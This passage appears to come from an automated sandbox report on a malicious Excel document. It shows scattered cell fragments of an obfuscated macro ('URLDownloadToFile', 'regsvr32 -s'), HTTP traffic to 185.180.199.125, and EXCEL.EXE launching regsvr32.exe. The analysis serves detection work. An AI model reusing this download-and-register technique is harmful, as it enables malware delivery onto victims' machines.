,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,LDownl,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,oa,,dToFile,,,,,,,,,,,,,,,,,,,,re,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,gs,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""vr32 -s """,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJC,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 11, 2021 14:50:04.843034983 CEST | 49732 | 80 | 192.168.2.4 | 185.180.199.125 |
Jun 11, 2021 14:50:07.869767904 CEST | 49732 | 80 | 192.168.2.4 | 185.180.199.125 |
Jun 11, 2021 14:50:13.870929956 CEST | 49732 | 80 | 192.168.2.4 | 185.180.199.125 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 11, 2021 14:49:48.324701071 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:48.374727964 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:49:49.182971954 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:49.233036995 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:49:50.390969038 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:50.452276945 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:49:50.545761108 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:50.598645926 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:49:51.359103918 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:51.409506083 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:49:52.428375006 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:52.490309000 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:49:53.389934063 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:53.451335907 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:49:55.380990028 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:55.431484938 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:00.048047066 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:00.106736898 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:01.164877892 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:01.253294945 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:01.255244970 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:01.303287983 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:01.680219889 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:01.753287077 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:02.683293104 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:02.757914066 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:03.730600119 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:03.788909912 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:04.911463976 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:04.964689016 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:05.775980949 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:05.834357977 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:05.916295052 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:05.967521906 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:07.027144909 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:07.077236891 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:08.133371115 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:08.183768034 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:09.501938105 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:09.552122116 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:09.823268890 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:09.881354094 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:10.873049021 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:10.923240900 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:12.856221914 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:12.907651901 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:13.990744114 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:14.043590069 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:14.791461945 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:14.841577053 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:21.708949089 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:21.778635979 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:42.524744034 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:42.686141014 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:43.556036949 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:43.569689035 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:43.630963087 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:43.684022903 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:44.653618097 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:44.716768026 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:46.309809923 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:46.373554945 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:47.062215090 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:47.124069929 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:47.771543980 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:47.833311081 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:48.396869898 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:48.458523035 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:48.917085886 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:48.995007992 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:49.415168047 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:49.475142002 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:50.420932055 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:50.479528904 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:50.946476936 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:51.005620003 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:51:01.954385996 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:51:02.016139030 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:51:30.095721006 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:51:30.169874907 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:51:32.125050068 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:51:32.187365055 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 14:49:59 |
Start date: | 11/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xd70000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 14:50:25 |
Start date: | 11/06/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xb50000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|